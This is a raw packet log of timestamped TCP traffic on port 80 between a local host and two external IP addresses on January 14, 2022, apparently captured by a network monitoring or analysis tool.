Jan 14, 2022 00:16:15.543057919 CET	49920	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:15.543076038 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.543097973 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.543101072 CET	49920	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:15.543119907 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.543140888 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.543153048 CET	49920	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:15.543194056 CET	49920	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:15.543195963 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.543237925 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.543271065 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.543306112 CET	49920	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:15.543358088 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.543380976 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.543402910 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.543414116 CET	49920	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:15.543452024 CET	49920	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:15.612343073 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.612375975 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.612396002 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.612413883 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.612435102 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.612454891 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.612473965 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.612474918 CET	49920	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:15.612495899 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.612500906 CET	49920	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:15.612520933 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.612543106 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.612560987 CET	49920	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:15.612565041 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.612586975 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.612587929 CET	49920	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:15.612610102 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.612637997 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.612656116 CET	49920	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:15.612658978 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.612682104 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.612699032 CET	49920	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:15.612701893 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.612725973 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.612739086 CET	49920	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:15.612792969 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.612814903 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.612828970 CET	49920	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:15.612884045 CET	49920	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:15.613780022 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.613804102 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.613825083 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.613845110 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.613873959 CET	49920	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:15.613884926 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.613903999 CET	49920	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:15.613909006 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.613931894 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.613955021 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.613959074 CET	49920	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:15.614001989 CET	49920	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:15.614141941 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.614165068 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.614187002 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.614209890 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.614227057 CET	49920	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:15.614232063 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.614255905 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.614265919 CET	49920	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:15.614279032 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.614312887 CET	49920	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:15.614355087 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.614404917 CET	49920	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:15.615484953 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.615509033 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.615669012 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.615674973 CET	49920	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:15.615690947 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.615711927 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.615732908 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.615751028 CET	49920	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:15.615752935 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.615777016 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.615854979 CET	49920	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:15.615861893 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.615875959 CET	49920	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:15.615888119 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.615943909 CET	49920	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:15.616569042 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.616595030 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.616667032 CET	49920	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:15.616722107 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.616745949 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.616827965 CET	49920	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:15.616836071 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.616863966 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.616885900 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.616906881 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.616926908 CET	49920	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:15.616930008 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.616952896 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.616971970 CET	49920	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:15.616974115 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.616997004 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.617017984 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.617027044 CET	49920	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:15.617039919 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.617052078 CET	49920	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:15.617063999 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.617085934 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.617091894 CET	49920	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:15.617110014 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.617130995 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.617151022 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.617161989 CET	49920	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:15.617172956 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.617181063 CET	49920	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:15.617197037 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.617218018 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.617223978 CET	49920	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:15.617238998 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.617259979 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.617266893 CET	49920	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:15.617311001 CET	49920	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:15.617362022 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.617383957 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.617403984 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.617425919 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.617436886 CET	49920	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:15.617448092 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.617472887 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.617474079 CET	49920	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:15.617522001 CET	49920	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:15.617603064 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.617626905 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.617649078 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.617670059 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.617681980 CET	49920	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:15.617691040 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.617747068 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.617754936 CET	49920	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:15.617770910 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.617794037 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.617805004 CET	49920	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:15.617842913 CET	49920	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:15.617894888 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.617917061 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.617938995 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.617959976 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.617980003 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.617983103 CET	49920	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:15.618002892 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.618014097 CET	49920	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:15.618053913 CET	49920	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:15.618208885 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.618232965 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.618254900 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.618280888 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.618297100 CET	49920	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:15.618303061 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.618326902 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.618347883 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.618349075 CET	49920	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:15.618371010 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.618375063 CET	49920	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:15.618391991 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.618413925 CET	80	49920	141.8.194.74	192.168.2.4
Jan 14, 2022 00:16:15.618432045 CET	49920	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:15.618486881 CET	49920	80	192.168.2.4	141.8.194.74
Jan 14, 2022 00:16:15.622513056 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:15.622643948 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:15.622757912 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:15.622970104 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:15.623079062 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:15.623178005 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:15.623275995 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:15.623373985 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:15.623476028 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:15.623574018 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:15.623673916 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:15.623769999 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:15.623874903 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:15.623971939 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:15.624073029 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:15.624171019 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:15.624270916 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:15.624380112 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:15.624469042 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:15.624567032 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:15.624665976 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:15.624749899 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:15.630549908 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:15.630749941 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:15.630992889 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:15.631093025 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:15.631191015 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:15.631459951 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:15.631558895 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:15.631665945 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:15.631769896 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:15.631870031 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:15.631975889 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:15.632075071 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:15.632174969 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:15.632277012 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:15.632374048 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:15.632472038 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:15.632567883 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:15.632682085 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:15.632774115 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:15.632869959 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:15.632963896 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:15.633162022 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:15.633251905 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:15.633346081 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:15.633439064 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:15.633534908 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:15.633620977 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:15.633713007 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:15.633917093 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:15.634017944 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:15.634111881 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:15.634202957 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:15.634293079 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:15.634386063 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:15.634496927 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:15.634596109 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:15.634701014 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:15.634829998 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:15.634941101 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:15.635040045 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:15.635142088 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:15.635238886 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:15.635334969 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:15.635435104 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:15.635530949 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:15.635631084 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:15.635736942 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:15.636482954 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:15.636584044 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:15.636678934 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:15.636771917 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:15.636868954 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:15.636961937 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:15.637181044 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:15.637286901 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:15.637466908 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:15.637645006 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:15.637748003 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:15.637854099 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:15.638024092 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:15.638135910 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:15.638221025 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:15.638319016 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:15.638418913 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:15.638520956 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:15.638914108 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:15.639013052 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:15.639106989 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:15.639202118 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:15.639295101 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:15.639388084 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:15.650656939 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:15.650787115 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:15.650887012 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:15.650998116 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:15.651091099 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:15.651184082 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:15.651277065 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:15.651371002 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:15.651460886 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:15.651563883 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:15.658950090 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:15.659065962 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:15.659266949 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:15.659281969 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:15.659363985 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:15.659468889 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:15.659578085 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:15.659677982 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:15.659776926 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:15.659929037 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:15.660034895 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:15.660161972 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:15.660255909 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:15.660363913 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:15.660485983 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:15.660612106 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:15.660737038 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:15.660886049 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:15.661010981 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:15.661123991 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:15.661206961 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:15.661303043 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:15.661389112 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:15.661478996 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:15.661566019 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:15.661655903 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:15.661746979 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:15.661864042 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:15.661957979 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:15.662043095 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:15.662132025 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:15.662220001 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:15.662311077 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:15.662400961 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:15.662487984 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:15.662610054 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:15.662734985 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:15.662935972 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:15.663043022 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:15.663146019 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:15.663248062 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:15.663347960 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:15.663449049 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:15.663646936 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:15.663753986 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:15.663861990 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:15.663964987 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:15.664062977 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:15.664160967 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:15.664261103 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:15.664360046 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:15.664458990 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:15.664556026 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:15.664658070 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:15.664760113 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:15.664858103 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:15.664958000 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:15.665060043 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:15.665158987 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:15.665256023 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:15.665358067 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:15.665456057 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:15.665554047 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:15.665657043 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:15.665751934 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:15.665855885 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:15.665958881 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:15.666059017 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:15.666160107 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:15.666260004 CET	49902	80	192.168.2.4	185.215.113.35
Jan 14, 2022 00:16:15.666363955 CET	49902	80	192.168.2.4	185.215.113.35
